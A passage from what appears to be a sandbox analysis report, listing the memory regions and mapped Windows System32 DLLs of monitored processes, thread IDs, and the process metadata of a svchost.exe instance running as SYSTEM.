0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" 
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 36089 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 36090 start_va = 0x6fda0000 end_va = 0x6fdc7fff entry_point = 0x6fda0000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 36091 start_va = 0x6fdd0000 end_va = 0x6fe0dfff entry_point = 0x6fdd0000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 36092 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 36093 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 36094 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 36095 start_va = 0x704b0000 end_va = 0x704d3fff entry_point = 0x704b0000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 36096 start_va = 0x71900000 end_va = 0x71916fff entry_point = 0x71900000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 36097 start_va = 0x73670000 end_va = 0x73681fff entry_point = 
0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 36098 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 36099 start_va = 0x736a0000 end_va = 0x736a4fff entry_point = 0x736a0000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 36100 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 36101 start_va = 0x736f0000 end_va = 0x73712fff entry_point = 0x736f0000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 36102 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 36103 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 36104 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 36105 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 36106 
start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 36107 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 36108 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 36109 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 36110 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 36111 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 36112 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 36113 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 36114 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" 
(normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 36115 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 36116 start_va = 0x74b30000 end_va = 0x74b6cfff entry_point = 0x74b30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 36117 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36118 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 36119 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 36120 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 36121 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36122 start_va = 0x74f20000 end_va = 0x74f4afff entry_point = 0x74f20000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 36123 start_va = 0x74f80000 end_va = 0x74f96fff entry_point = 0x74f80000 
region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 36124 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 36125 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36126 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36127 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36128 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36129 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36130 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36131 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") 
Region: id = 36132 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36133 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36134 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 36135 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36136 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 36137 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36138 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 36139 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36140 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" 
(normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36141 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 36142 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36143 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36144 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36145 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36146 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 36147 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36148 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36149 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = 
"shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 36150 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36151 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36152 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36153 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36154 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36155 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36156 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36157 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 36158 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 36159 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffad000" filename = "" Region: id = 36160 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 36161 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36162 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 36163 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36164 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36165 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36166 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36167 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36168 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36169 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36170 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36171 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36172 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Thread: id = 900 os_tid = 0xc8c Thread: id = 901 os_tid = 0x904 Thread: id = 902 os_tid = 0x268 Thread: id = 903 os_tid = 0x3f8 Thread: id = 904 os_tid = 0x6e0 Thread: id = 905 os_tid = 0xc8 Thread: id = 906 os_tid = 0x724 Thread: id = 907 os_tid = 0x688 Thread: id = 908 os_tid = 0x5f0 Thread: id = 909 os_tid = 0x468 Thread: id = 910 os_tid = 0x464 Thread: id = 911 os_tid = 0x460 Thread: id = 912 os_tid = 0x454 Thread: id = 913 os_tid = 0x444 Thread: id = 914 os_tid = 0x440 Thread: id = 940 os_tid = 0xd24 Thread: id = 946 os_tid = 0xf20 Thread: id = 948 os_tid = 0xee0 Thread: id = 949 os_tid = 0xe14 Thread: id = 951 os_tid = 0xfe0 Process: id = "656" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea161a0" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a86c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 36191 start_va = 0x10000 end_va = 0x1ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36192 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 36193 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 36194 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 36195 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 36196 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36197 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 36198 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 36199 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36200 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36201 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 36202 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 36203 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 36204 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 36205 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 36206 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 36207 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36208 start_va = 0x360000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 36209 start_va = 0x470000 end_va = 0x471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 36210 start_va = 0x480000 end_va = 0x481fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 36211 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 36212 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 36213 start_va = 0x4f0000 end_va = 0x56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 36214 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 36215 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 36216 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = 
"private_0x00000000009b0000" filename = "" Region: id = 36217 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 36218 start_va = 0xa30000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 36219 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 36220 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 36221 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 36222 start_va = 0xaa0000 end_va = 0xaa4fff entry_point = 0xaa0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 36223 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 36224 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 36225 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 36226 start_va = 0xb90000 end_va = 0xe5efff entry_point = 0xb90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 36227 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 36228 start_va = 0xec0000 end_va = 0xefffff entry_point = 0x0 region_type = private name 
= "private_0x0000000000ec0000" filename = "" Region: id = 36229 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36230 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 36231 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 36232 start_va = 0x1080000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 36233 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 36234 start_va = 0x12a0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 36235 start_va = 0x1300000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 36236 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 36237 start_va = 0x1430000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 36238 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 36239 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 36240 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 36241 start_va = 0x1610000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 36242 
start_va = 0x1620000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 36243 start_va = 0x1660000 end_va = 0x16ebfff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 36244 start_va = 0x1720000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 36245 start_va = 0x17a0000 end_va = 0x17affff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 36246 start_va = 0x17c0000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 36247 start_va = 0x17d0000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 36248 start_va = 0x18e0000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 36249 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 36250 start_va = 0x19a0000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 36251 start_va = 0x1aa0000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 36252 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 36253 start_va = 0x2000000 end_va = 0x2100fff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 36254 start_va = 0x2520000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 36255 start_va = 0x2720000 end_va = 0x2b1ffff entry_point = 0x0 
